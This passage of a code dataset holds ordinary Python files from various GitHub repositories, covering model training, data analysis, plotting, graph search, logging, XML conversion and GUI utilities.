f\"{TRAINING_DATASET_PATH}/{str(relative_path)}/*\"\n\n if not Path(dataset_pattern[:-2]).exists():\n raise Exception(\n f\"The dataset path 
{dataset_pattern[:-2]} doesn't exist\")\n\n gin_file_path = f\"{GINS_PATH}/{gin_file}\"\n\n # Make custom save path\n if save_tag is None:\n save_path = f\"{CHECKPOINTS_PATH}/{relative_path}\"\n else:\n save_path = f\"{CHECKPOINTS_PATH}/{save_tag}\"\n\n if not Path(save_path).exists():\n os.mkdir(save_path)\n assert Path(save_path).exists()\n\n # Load gin config\n gin.parse_config_file(gin_file_path)\n\n prepare_tfrecord()\n\n\ndef train_multiple(relative_path, n_pairs):\n for pair in n_pairs:\n save_tag = f\"{relative_path}_h{pair[0]}_n{pair[1]}\"\n print(f\"Training {save_tag}\")\n train(relative_path, \"z.gin\", save_tag=save_tag)\n\n\nif __name__ == \"__main__\":\n pairs = [\n (20, 10),\n (20, 30),\n (20, 60),\n (20, 80),\n (60, 10),\n (60, 30),\n (60, 60),\n (60, 80),\n (100, 10),\n (100, 30),\n (100, 60),\n (100, 80),\n ]\n\n train_multiple(\"ColdplaySelected\", pairs)\n","repo_name":"harrytwigg/FEEG3003","sub_path":"vocal_ddsp/vocaliser/scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"10104607310","text":"import math\nimport numpy as np\nfrom sailboat_playground.constants import constants\n\n\ndef compute_angle(vec: np.ndarray):\n try:\n assert vec.shape == (2,)\n except AssertionError:\n raise AssertionError(\n f\"Failed to compute angle on vector with shape different from (2,): Shape is {vec.shape}\")\n ang = math.atan2(vec[1], vec[0])\n while ang < 0:\n ang += 2 * np.pi\n while ang > 2 * np.pi:\n ang -= 2 * np.pi\n return ang\n\n\ndef norm_to_vector(norm: float, angle_rad: float):\n return np.array([np.cos(angle_rad), np.sin(angle_rad)]) * norm\n","repo_name":"gabriel-milan/sailboat-playground","sub_path":"sailboat_playground/engine/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"65"} +{"seq_id":"44808829934","text":"from itertools import *\nimport torch\nfrom allennlp.nn import util\nfrom allennlp.nn.util import min_value_of_dtype, replace_masked_values\nfrom functools import lru_cache\n\n\n@lru_cache(maxsize=128)\ndef compute_op_idx(batch_size, seq_len, binary_op_count, unary_op_count, device):\n binary_op_ids = torch.arange(\n binary_op_count, dtype=torch.int64, device=device\n ).expand([batch_size, seq_len ** 2, binary_op_count])\n unary_op_ids = (\n torch.arange(unary_op_count, dtype=torch.int64, device=device) + binary_op_count\n ).expand([batch_size, seq_len, unary_op_count])\n\n frontier_op_ids = torch.cat(\n [\n binary_op_ids.reshape([batch_size, -1]),\n unary_op_ids.reshape([batch_size, -1]),\n ],\n dim=-1,\n )\n return frontier_op_ids\n\n\n@lru_cache(maxsize=128)\ndef compute_beam_idx(batch_size, seq_len, binary_op_count, unary_op_count, device):\n binary_beam_idx = (\n torch.arange(seq_len ** 2, device=device)\n .unsqueeze(0)\n .unsqueeze(-1)\n .expand([batch_size, seq_len ** 2, binary_op_count])\n .reshape([batch_size, -1])\n )\n l_binary_beam_idx = binary_beam_idx // seq_len\n r_binary_beam_idx = binary_beam_idx % seq_len\n unary_beam_idx = (\n torch.arange(seq_len, device=device)\n .unsqueeze(0)\n .unsqueeze(-1)\n .expand([batch_size, seq_len, unary_op_count])\n .reshape([batch_size, -1])\n )\n l_beam_idx = torch.cat([l_binary_beam_idx, unary_beam_idx], dim=-1)\n r_beam_idx = torch.cat([r_binary_beam_idx, unary_beam_idx], dim=-1)\n return l_beam_idx, r_beam_idx\n\n\ndef batched_span_select(target: 
torch.Tensor, spans: torch.LongTensor) -> torch.Tensor:\n \"\"\"\n The given `spans` of size `(batch_size, num_spans, 2)` indexes into the sequence\n dimension (dimension 2) of the target, which has size `(batch_size, sequence_length,\n embedding_size)`.\n This function returns segmented spans in the target with respect to the provided span indices.\n It does not guarantee element order within each span.\n # Parameters\n target : `torch.Tensor`, required.\n A 3 dimensional tensor of shape (batch_size, sequence_length, embedding_size).\n This is the tensor to be indexed.\n indices : `torch.LongTensor`\n A 3 dimensional tensor of shape (batch_size, num_spans, 2) representing start and end\n indices (both inclusive) into the `sequence_length` dimension of the `target` tensor.\n # Returns\n span_embeddings : `torch.Tensor`\n A tensor with shape (batch_size, num_spans, max_batch_span_width, embedding_size]\n representing the embedded spans extracted from the batch flattened target tensor.\n span_mask: `torch.BoolTensor`\n A tensor with shape (batch_size, num_spans, max_batch_span_width) representing the mask on\n the returned span embeddings.\n \"\"\"\n # both of shape (batch_size, num_spans, 1)\n span_starts, span_ends = spans.split(1, dim=-1)\n\n # shape (batch_size, num_spans, 1)\n # These span widths are off by 1, because the span ends are `inclusive`.\n span_widths = span_ends - span_starts\n\n # We need to know the maximum span width so we can\n # generate indices to extract the spans from the sequence tensor.\n # These indices will then get masked below, such that if the length\n # of a given span is smaller than the max, the rest of the values\n # are masked.\n max_batch_span_width = span_widths.max().item() + 1\n\n # Shape: (1, 1, max_batch_span_width)\n max_span_range_indices = util.get_range_vector(\n max_batch_span_width, util.get_device_of(target)\n ).view(1, 1, -1)\n # print(max_batch_span_width)\n # print(max_span_range_indices)\n # Shape: (batch_size, num_spans, max_batch_span_width)\n # This is a broadcasted comparison - for each span we are considering,\n # we are creating a range vector of size max_span_width, but masking values\n # which are greater than the actual length of the span.\n #\n # We're using <= here (and for the mask below) because the span ends are\n # inclusive, so we want to include indices which are equal to span_widths rather\n # than using it as a non-inclusive upper bound.\n span_mask = max_span_range_indices <= span_widths\n # raw_span_indices = span_ends - max_span_range_indices\n raw_span_indices = span_starts + max_span_range_indices\n # print(raw_span_indices)\n # print(target.size())\n # We also don't want to include span indices which are less than zero,\n # which happens because some spans near the beginning of the sequence\n # have an end index < max_batch_span_width, so we add this to the mask here.\n span_mask = span_mask & (raw_span_indices < target.size(1))\n # print(span_mask)\n # span_indices = torch.nn.functional.relu(raw_span_indices.float()).long()\n span_indices = raw_span_indices * span_mask\n # print(span_indices)\n\n # Shape: (batch_size, num_spans, max_batch_span_width, embedding_dim)\n span_embeddings = util.batched_index_select(target, span_indices)\n\n return span_embeddings, span_mask\n\n\ndef shuffle(t):\n idx = torch.randperm(t.nelement())\n return t.view(-1)[idx].view(t.size())\n\n\ndef isin(key, query):\n key, _ = key.sort()\n a = torch.searchsorted(key, query, right=True)\n b = torch.searchsorted(key, query, right=False)\n 
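# right=True vs right=False yield the upper and lower insertion indices;\n    # the two differ exactly at positions where a query value occurs in key.\n    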
return (a != b).float()\n\n\ndef replace_masked_values_with_big_negative_number(x: torch.Tensor, mask: torch.Tensor):\n \"\"\"\n Replace the masked values in a tensor something really negative so that they won't\n affect a max operation.\n \"\"\"\n return replace_masked_values(x, mask, min_value_of_dtype(x.dtype))\n\n\ndef get_span_scores(\n span_start_logits: torch.Tensor, span_end_logits: torch.Tensor\n) -> torch.Tensor:\n \"\"\"\n This acts the same as the static method ``BidirectionalAttentionFlow.get_best_span()``\n in ``allennlp/models/reading_comprehension/bidaf.py``. We keep it here so that users can\n directly import this function without the class.\n We call the inputs \"logits\" - they could either be unnormalized logits or normalized log\n probabilities. A log_softmax operation is a constant shifting of the entire logit\n vector, so taking an argmax over either one gives the same result.\n \"\"\"\n if span_start_logits.dim() != 2 or span_end_logits.dim() != 2:\n raise ValueError(\"Input shapes must be (batch_size, passage_length)\")\n batch_size, passage_length = span_start_logits.size()\n device = span_start_logits.device\n # (batch_size, passage_length, passage_length)\n span_log_probs = span_start_logits.unsqueeze(2) + span_end_logits.unsqueeze(1)\n # Only the upper triangle of the span matrix is valid; the lower triangle has entries where\n # the span ends before it starts.\n span_log_mask = torch.triu(\n torch.ones((passage_length, passage_length), device=device)\n ).log()\n valid_span_log_probs = span_log_probs + span_log_mask\n\n # Here we take the span matrix and flatten it, then find the best span using argmax. We\n # can recover the start and end indices from this flattened list using simple modular\n # arithmetic.\n # (batch_size, passage_length * passage_length)\n # best_spans = valid_span_log_probs.view(batch_size, -1).argmax(-1)\n # span_start_indices = best_spans // passage_length\n # span_end_indices = best_spans % passage_length\n # return torch.stack([span_start_indices, span_end_indices], dim=-1)\n return valid_span_log_probs\n","repo_name":"OhadRubin/SmBop","sub_path":"smbop/utils/vec_utils.py","file_name":"vec_utils.py","file_ext":"py","file_size_in_byte":7557,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"65"} +{"seq_id":"35310614852","text":"import sys\nfrom collections import Counter\n\ntry:\n num_words = int(sys.argv[1])\nexcept:\n print(\"Usage: python most_common_words.py num_words\")\n sys.exit(1)\n\ncounter = Counter([word.lower() for line in sys.stdin\n for word in line.strip().split()])\n\nfor word, count in counter.most_common(num_words):\n sys.stdout.write(f\"{word}: {count} \\n\")\n","repo_name":"starsinmypockets/python_machine_learning","sub_path":"data_science_from_scratch/common_words.py","file_name":"common_words.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"70194701326","text":"#Test program for MLX90640 class, uses matplotlib for plotting temperatures\n#Based on example from https://matplotlib.org/stable/gallery/animation/animation_demo.html\n#UBC PHAS E-lab, Nov 2022\n#Required Packages:\n#pyserial\n#matplotlib\n\n\n\nfrom MLX90640 import MLX90640\nimport matplotlib\nmatplotlib.use('Tkagg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n#MLX Framerate values 0-7 are 0.5-64Hz\n#0 = 0.5Hz\n#1 = 1Hz\n#2 = 2Hz\n#3 = 4Hz\n#4 = 8Hz\n#5 = 16Hz\n#6 = 32Hz\n#7 = 64Hz\nsensor = 
MLX90640(port=\"COM5\", baud=115200, framerate=3)#Actual COM port name will depend on the system\n\nfig, ax = plt.subplots()\nplt.inferno()\nloop = 0\ntry:\n    while True:\n        #Calculate temperature values from MLX RAM\n        floatarray = [[sensor.getCompensatedPixDataRAM(i+1,j+1) for i in range(24)] for j in range(32)]\n        cmap = ax.imshow(floatarray) #Show the image\n        ax.set_title(\"Temperature Map\")\n        cb = fig.colorbar(cmap, ax = ax) #Show a colorbar\n        plt.pause(0.001)\n        sensor.updateRAM() #get a new copy of RAM from MLX90640\n        loop = loop + 1\n        print(loop)\n        cb.remove() #remove old plots\n        ax.cla()\nfinally:\n    sensor.close()\n","repo_name":"chsyan/IR-Camera","sub_path":"MLXtest Matplotlib.py","file_name":"MLXtest Matplotlib.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"71512273808","text":"graph = {\n    1: [2, 3, 4],\n    2: [5],\n    3: [5],\n    4: [],\n    5: [6, 7],\n    6: [],\n    7: [3],\n}\n\n\ndef recursive_dfs(v: int, discovered: list[int] | None = None) -> list[int]:\n    # a mutable default argument ([]) would be shared across calls,\n    # so create a fresh list on each top-level call instead\n    if discovered is None:\n        discovered = []\n    discovered.append(v)\n    for w in graph[v]:\n        if w not in discovered:\n            discovered = recursive_dfs(w, discovered)\n    return discovered\n\n\ndef iterative_dfs(start_v: int):\n    discovered = []\n    stack = [start_v]\n    while stack:\n        v = stack.pop()\n        if v not in discovered:\n            discovered.append(v)\n            stack.extend(graph[v])\n    return discovered\n\n\nif __name__ == '__main__':\n    print(f'recursive dfs: {recursive_dfs(1)}')\n    print(f'iterative dfs: {iterative_dfs(1)}')\n","repo_name":"flynnpark/leetcode-py","sub_path":"dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"65"} +{"seq_id":"22305067341","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import patches\nimport warnings\nwarnings.simplefilter(action = 'ignore', category=FutureWarning) # suppress FutureWarning\n\ntrain = pd.read_csv('data/train.csv')\n\n# Basic sanity checks on the data\n#print(train.head())\nprint(train.shape)\n\n# Check for missing values\n# A missing value (NA: Not Available) is a data point whose value is absent.\n# For accurate analysis, missing values must be identified and handled appropriately.\ndef check_missing_col(dataframe):\n    missing_col = []\n    for col in dataframe.columns:\n        missing_values = sum(dataframe[col].isna())\n        is_missing = True if missing_values >= 1 else False\n        if is_missing:\n            print(f'Column with missing values: {col}')\n            print(f'This column has {missing_values} missing values in total.')\n            missing_col.append([col, dataframe[col].dtype])\n    if missing_col == []:\n        print('No missing values found')\n    return missing_col\n\nmissing_col = check_missing_col(train)\nprint(missing_col)\n\n# Check whether the columns with missing values are categorical or numeric\n#print(train['workclass'].unique())\n#print(train['occupation'].unique())\n#print(train['native.country'].unique())\n\n# All columns with missing values are categorical, so the affected rows can simply be dropped\ndef handle_na(data, missing_col):\n    temp = data.copy()\n    for col, dtype in missing_col:\n        if dtype == 'O':\n            # Drop the rows where a categorical feature is missing.\n            temp = temp.dropna(subset=[col])\n    return temp\n\ntrain = handle_na(train, missing_col)\nmissing_col = check_missing_col(train)\nprint(missing_col)\n\n# Redefine target in terms of income\ntrain['target'] = train['target'].apply(lambda x : '<=50K' if x == 0 else '>50K' )\n\n# Check the class distribution: income <=50K vs >50K\ncounted_values = train['target'].value_counts()\nplt.style.use('ggplot')\nplt.figure(figsize = (12,10))\nplt.title('class counting', fontsize = 30)\nvalue_bar_ax = sns.barplot(x=counted_values.index, y=counted_values)\nvalue_bar_ax.tick_params(labelsize=20)\n#plt.show()
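\n# An equivalent one-liner for the class balance:\n# train['target'].value_counts(normalize=True) returns the class shares directly.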
y=counted_values)\nvalue_bar_ax.tick_params(labelsize=20)\n#plt.show()\n\nprint(train.info())\n\n#범주형 피처 데이터를 시각화 하기 위해 범주형 피처만을 가진 데이터 프레임을 생성\ntrain_categori = train.drop(['id', 'age', 'fnlwgt', 'education.num', 'capital.gain', 'capital.loss', 'hours.per.week'],axis = 1) #범주형이 아닌 피쳐 drop\n\n#범주형 데이터 분포를 확인해보자\ndef visualize(axx, field, num): ##그래프를 그리기 위한 메소드\n sns.countplot(train_categori.columns[num], data= train_categori[train_categori['target'] == field], color='#eaa18a', ax = axx) # countplot을 이용하여 그래프를 그려줍니다.\n axx.set_title(field)\n\nfigure, ((ax1,ax2),(ax3,ax4), (ax5, ax6),(ax7, ax8), (ax9, ax10),\n (ax11,ax12),(ax13,ax14), (ax15, ax16)) = plt.subplots(nrows=8, ncols=2) ## 원하는 개수의 subplots 만들어주기\nfigure.set_size_inches(40, 50) #(w,h)\nfigure.suptitle('Compare categorical features', fontsize=40, y = 0.9)\n\nk = 0 # 피쳐 수\nj = 1 # 그래프 수\nwhile k<8:\n for i in range(0,2):\n visualize(eval(f'ax{j}'), train_categori['target'].unique()[i], k)\n j = j+1\n k = k+1\n\nplt.show()\n\n\n# 수치형 데이터 분포 확인\ntrain_numeric = train[['age', 'fnlwgt', 'capital.gain', 'capital.loss', 'hours.per.week', 'target']] #수치형 피쳐와 label인 target 추출\n\ndef visualize(axx, field, num):\n line = train_numeric[train_numeric['target'] == field] #메소드에서 target 클래스 추춣\n name = train_numeric[train_numeric['target'] == field][train_numeric.columns[num]].name #메소드에서 이름 추출\n sns.kdeplot(x = line[train_numeric.columns[num]], data = train_numeric, ax = axx, color='#eaa18a') #countplot을 이용하여 그래프를 그려줍니다.\n axx.axvline(line.describe()[name]['mean'], c='#f55354', label = f\"mean = {round(line.describe()[name]['mean'], 2)}\") #mean 통계값을 표기해줍니다.\n axx.axvline(line.describe()[name]['50%'], c='#518d7d', label = f\"median = {round(line.describe()[name]['50%'], 2)}\") #median 통계값을 표기해줍니다.\n axx.legend()\n axx.set_title(field)\n\nfigure, ((ax1,ax2),(ax3,ax4), (ax5, ax6),(ax7, ax8), (ax9, ax10)) = plt.subplots(nrows=5, ncols=2) ##원하는 개수의 subplots 만들어주기\nfigure.set_size_inches(40, 50) #(w,h)\nfigure.suptitle('Compare numeric features', fontsize=40, y = 0.9)\n\nk = 0 # 피쳐 수\nj = 1 # 그래프 수\nwhile k<5:\n for i in range(0,2):\n visualize(eval(f'ax{j}'), train_numeric['target'].unique()[i], k)\n j = j+1\n k = k+1\n\nplt.show(block=True)\n\n\n#상관관계\nplt.style.use('ggplot')\nplt.figure(figsize=(12, 10))\nplt.title('capital gain and working time', fontsize = 30)\nsns.scatterplot(x = 'capital.gain', y= 'hours.per.week', hue= 'target', data= train[train['capital.gain'] > 0]) #산포도를 확실하게 차이나도록 시각화 해주기 위하여 capital.gain에서 0값을 제외\n\nplt.style.use('ggplot')\nplt.figure(figsize=(12, 10))\nplt.title('capital gain and working time', fontsize = 30)\nsns.scatterplot(x = 'age', y= 'capital.loss', hue= 'target', data= train[train['capital.loss'] > 0]) #산포도를 확실하게 차이나도록 시각화 해주기 위하여 capital.loss에서 0값을 제외","repo_name":"kumakuma34/Dacon_-","sub_path":"EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":5554,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"25996290720","text":"# В большой текстовой строке подсчитать количество встречаемых\n# слов и вернуть 10 самых частых. Не учитывать знаки препинания\n# и регистр символов. За основу возьмите любую статью\n# из википедии или из документации к языку.\n\nwith open('constitution.txt', 'r', encoding='UTF-8') as file:\n text = file.read()\n\n# Удаляем все символы кроме букв и пробелов. 
Перводим всё в нижний регистр.\ntext_new = ''\nfor i in text:\n if i.isalpha() or i.isspace():\n text_new += i.lower()\n\n# Делаем список слов и множество уникальных слов в тексте\nwords = text_new.split()\nset_words = set(words)\n\n# Создаем словарь и подсчитываем частоту слов\ndict_words = {}\nfor i in set_words:\n dict_words.setdefault(i, words.count(i))\n\n# Сортируем словарь по количеству повторений слов\nsorted_dict = dict(sorted(dict_words.items(), reverse=True, key=lambda item: item[1]))\n\n# Выводим 10 наиболее часто втречающихся слов\niterations = 0 \nfor key, value in sorted_dict.items():\n print(f'{key:>15} - {value}')\n iterations += 1\n \n if iterations == 10:\n break\n","repo_name":"Narendill/Python","sub_path":"HW-3/Task-2-HW.py","file_name":"Task-2-HW.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
+{"seq_id":"16575007021","text":"class Node:\n\n def __init__(self, data: int):\n\n self.data = data;\n self.next = None;\n\n\nclass LinkedList(Node):\n\n def __init__(self, data: int):\n\n self.head = Node(data)\n\n def insertAtHead(self, item: int):\n\n headNode = self.head\n self.head = Node(item)\n self.head.next = headNode\n\n return\n\n def insertAtTail(self, item: int):\n\n if self.head == None:\n self.insertAtHead(item)\n return\n\n currentNode = self.head\n while currentNode.next != None:\n currentNode = currentNode.next\n\n currentNode.next = Node(item)\n\n return\n\n def remove(self, item: int):\n\n if self.head.data == item:\n\n self.head = self.head.next\n return\n\n previousNode = self.head\n currentNode = self.head.next\n\n while currentNode != None:\n\n if currentNode.data == item:\n\n previousNode.next = currentNode.next\n return\n\n previousNode = previousNode.next\n currentNode = currentNode.next\n\n return\n\n def printList(self):\n\n currentNode = self.head\n\n while currentNode != None:\n\n print(currentNode.data, end = \" -> \")\n currentNode = currentNode.next\n\n print(\"NULL\")\n\n return\n","repo_name":"Rushali-Sarkar/data-structures-algorithms","sub_path":"algorithms/linkedlist/linkedlist.py","file_name":"linkedlist.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"}
+{"seq_id":"42875489410","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 1 15:47:15 2019\n\n@author: johan\n\n\nThis script converts the xml annotations created by the image-preprocessing\nscript into csv annotations which can then be converted into tf record files\nby the generate_tfrecord script.\n\"\"\"\n\nimport glob\nimport pandas as pd\nimport xml.etree.ElementTree as ET\n\n\ndef xml_to_csv(input_folder, output_path, flowers_to_use=None):\n \"\"\"Iterates through all .xml files in the input_folder and combines them in a single Pandas datagrame.\n\n Parameters:\n input_folder (str): path to the input folder containing all images and\n xml annotation files\n output_path (str): path to the output csv file.\n flowers_to_use (list): a list of strings containing flower names. Only\n the annotations with flowernames present in the flowers_to_use list\n are copied to the output csv file. If flowers_tu_use is None, all\n annotations are used.\n \n Returns:\n Pandas datagrame of the csv list.\n \n \"\"\"\n\n xml_list = []\n for xml_file in glob.glob(input_folder + '/*.xml'):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for member in root.findall('object'):\n if flowers_to_use == None or member[0].text in flowers_to_use:\n value = (root.find('filename').text,\n int(root.find('size')[0].text),\n int(root.find('size')[1].text),\n member[0].text,\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text)\n )\n xml_list.append(value)\n column_name = ['filename', 'width', 'height',\n 'class', 'xmin', 'ymin', 'xmax', 'ymax']\n xml_df = pd.DataFrame(xml_list, columns=column_name)\n xml_df.to_csv(output_path, index=None)\n return xml_df\n\n\n\n\nif __name__ == '__main__':\n print(\"Please use the command line interface and run the image-preprocessing command.\")\n","repo_name":"gallmann/Phenotator-Toolbox","sub_path":"Tensorflow/utils/xml_to_csv.py","file_name":"xml_to_csv.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"}
+{"seq_id":"5684135833","text":"from pathlib import Path\nfrom logging.handlers import TimedRotatingFileHandler\nimport logging\n\n\ndef setup_logger(file_name):\n monster_path = Path(__file__).resolve().parent.parent\n log_format = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n \n logger = logging.getLogger(file_name)\n formatter = logging.Formatter(log_format)\n\n log_handler = TimedRotatingFileHandler(filename=f'{monster_path}/log/monster.log', when=\"midnight\", interval=1, backupCount=7)\n log_handler.setLevel(logging.ERROR)\n log_handler.setFormatter(formatter)\n\n if not logger.handlers:\n stream_handler = logging.StreamHandler()\n stream_handler.setLevel(logging.ERROR)\n stream_handler.setFormatter(formatter)\n\n logger.addHandler(stream_handler)\n logger.addHandler(log_handler)\n\n return logger\n\n\ndef get_logger(file_name):\n return setup_logger(file_name)\n","repo_name":"nsfcac/MonSter","sub_path":"monster/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"65"}
+{"seq_id":"25299126182","text":"# Python distribution modules\nfrom math import sqrt, ceil\n\n# Community modules\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import axhline\nfrom mpl_toolkits.mplot3d import axes3d\nfrom numpy import arange\nfrom pyEDM import ComputeError\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotEmbedDimension( df, args ):\n title = args.inputFile + \"\\nTp=\" + str(args.Tp)\n\n ax = df.plot( 'E', 'rho', title = title, linewidth = 3 )\n ax.set( xlabel = \"Embedding Dimension\",\n ylabel = \"Prediction Skill ρ\" )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotPredictNonlinear( df, args ):\n\n if args.embedded :\n E = len( args.columns )\n else :\n E = args.E\n\n title = args.inputFile + \"\\nE=\" + str( E )\n\n ax = df.plot( 'Theta', 'rho', title = title, linewidth = 3 )\n ax.set( xlabel = \"S-map Localisation (θ)\",\n ylabel = \"Prediction Skill ρ\" )\n\n#----------------------------------------------------------------------------\n# 
\n#----------------------------------------------------------------------------\ndef PlotPredictInterval( df, args ):\n\n if args.embedded :\n E = len( args.columns )\n else :\n E = args.E\n\n title = args.inputFile + \"\\nE=\" + str( E )\n\n ax = df.plot( 'Tp', 'rho', title = title, linewidth = 3 )\n ax.set( xlabel = \"Forecast Interval\",\n ylabel = \"Prediction Skill ρ\" )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef Plot3D( D, columnList, args ):\n\n fig = plt.figure()\n ax = fig.add_subplot( projection = '3d' )\n\n X, Y, Z = D[ columnList[0] ], \\\n D[ columnList[1] ], \\\n D[ columnList[2] ]\n\n # Plot\n if args.scatter :\n # s: marker size in points**2\n # c: marker colors\n ax.scatter( X, Y, Z, zdir = 'z', s = 20, c = None, depthshade = True )\n else :\n ax.plot( X, Y, Z )\n ax.set_xlabel( columnList[0] )\n ax.set_ylabel( columnList[1] )\n ax.set_zlabel( columnList[2] )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotCCM( libMeans, args ):\n title = args.inputFile + \"\\nE=\" + str( args.E )\n\n ax = libMeans.plot( 'LibSize',\n [ libMeans.columns[1], libMeans.columns[2] ],\n title = title, linewidth = 3 )\n ax.set( xlabel = \"Library Size\", ylabel = \"Cross Map ρ\" )\n axhline( y = 0, linewidth = 1 )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotObsPred_( df, args ):\n\n # stats: {'MAE': 0., 'RMSE': 0., 'rho': 0. }\n stats = ComputeError( df['Observations'], df['Predictions' ] )\n\n if args.embedded :\n E = len( args.columns )\n else :\n E = args.E\n\n title = args.inputFile + \"\\nE=\" + str( E ) + \" Tp=\" + str( args.Tp ) +\\\n \" ρ=\" + str( round( stats['rho'], 2 ) ) +\\\n \" RMSE=\" + str( round( stats['RMSE'], 2 ) )\n\n df.plot( df.columns[0], ['Observations', 'Predictions'],\n title = title, linewidth = 3 )\n\n#----------------------------------------------------------------------------\n# \n#----------------------------------------------------------------------------\ndef PlotCoeff_( df, args ):\n\n if args.embedded :\n E = len( args.columns )\n else :\n E = args.E\n\n title = args.inputFile + \"\\nE=\" + str( E ) + \" Tp=\" + str( args.Tp ) +\\\n \" S-Map Coefficients\"\n\n time_col = df.columns[0]\n # Coefficient columns can be in any column\n coef_cols = [ x for x in df.columns if time_col not in x ]\n\n df.plot( time_col, coef_cols, title = title, linewidth = 3,\n subplots = True )\n\n#----------------------------------------------------------------------------\n#\n#----------------------------------------------------------------------------\ndef PlotMutualInfo( df, args ):\n\n colNames = df.columns # lag, MI[v1:v2]..., CC[v1:v2]\n lags = df.loc[ :,'lag' ]\n\n numVars = len( args.columns )\n nRowCol = ceil( sqrt( numVars ) )\n\n # If numVars > 1, create a square matrix subplot\n fig, axs = plt.subplots( nRowCol, nRowCol )\n\n title = 'Mutual Info & Correlation nn:' + str( args.MI_neighbors )\n fig.suptitle( title )\n\n if numVars == 1 :\n axs.plot( lags, df.iloc[ :, 1 ], label = 'MI' )\n axs.plot( lags, df.iloc[ :, 2 ], label = 'CC' )\n axs.legend()\n axs.set_title( args.columns[ 0 ] + \":\" + args.target, y = 0 )\n else:\n MI_cols = range( 1, numVars + 1 )\n CC_cols = range( numVars + 1, 2 * 
numVars + 1 )\n k = 0\n for i in range( nRowCol ) :\n if k >= numVars :\n break\n\n for j in range( nRowCol ) :\n ax = axs[i,j]\n ax.plot( lags, df.loc[ :, colNames[MI_cols[k]] ], label='MI' )\n ax.plot( lags, df.loc[ :, colNames[CC_cols[k]] ], label='CC' )\n ax.legend()\n ax.set_title( args.columns[ k ] + \":\" + args.target,y=0 )\n\n k = k + 1\n\n if k >= numVars :\n break\n","repo_name":"SugiharaLab/jpyEDM","sub_path":"src/PlotFunctions.py","file_name":"PlotFunctions.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"65"} +{"seq_id":"27180124822","text":"import re\nimport logging\nfrom pkg_resources import working_set\nfrom tg import config\nfrom tg.i18n import ugettext as _\nfrom vigilo.turbogears.controllers import BaseController\n\nLOGGER = logging.getLogger(__name__)\n\nclass CustomController(BaseController):\n \"\"\"\n Un contrôleur qui facilite l'ajout d'extensions / personnalisations\n par des développeurs tiers.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialise le contrôleur en lui ajoutant dynamiquement\n des attributs (sous-contrôleurs), en fonction des points\n d'entrée définis dans le groupe \".controllers\".\n \"\"\"\n app_name = str(config.get('app_name')).lower()\n group = '%s.controllers' % app_name\n LOGGER.debug(\"Loading custom controllers\")\n for ep in working_set.iter_entry_points(group):\n if not re.match('^[a-z][a-z0-9_]*$', ep.name, re.I):\n LOGGER.warning(_(\"Not a valid controller name: %s\"), ep.name)\n else:\n ctrl = ep.load()\n if issubclass(ctrl, BaseController):\n LOGGER.debug(\"Added custom controller '%s'\" % ep.name)\n setattr(self, ep.name, ctrl())\n else:\n base_ctrl = \"%s.%s\" % (BaseController.__module__,\n BaseController.__name__)\n ep_path = \"%s.%s\" % (ep.module_name, ep.attrs[0])\n LOGGER.warning(\n _(\"%(entry)s is not a subclass of %(base)s\"),\n {\n 'base': base_ctrl,\n 'entry': ep_path,\n })\n super(CustomController, self).__init__(*args, **kwargs)\n","repo_name":"vigilo/turbogears","sub_path":"src/vigilo/turbogears/controllers/custom.py","file_name":"custom.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"fr","doc_type":"code","stars":3,"dataset":"github-code","pt":"65"} +{"seq_id":"22558018943","text":"import os\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nimport pymel.core as pm\n\n\nclass ScreenCapture(QtWidgets.QDialog):\n \"\"\"\n sc = ScreenCapture()\n sc.show()\n \"\"\"\n def __init__(self, parent=None):\n super(ScreenCapture, self).__init__(parent)\n\n self.startPos = None\n self.lastSelRectWidth = None\n\n self.capturedPixmap = None\n self.desktopPixmap = None\n self.selectedRect = QtCore.QRect()\n\n self.setGeometry(QtWidgets.QApplication.desktop().geometry())\n self.setAttribute(QtCore.Qt.WA_TranslucentBackground)\n 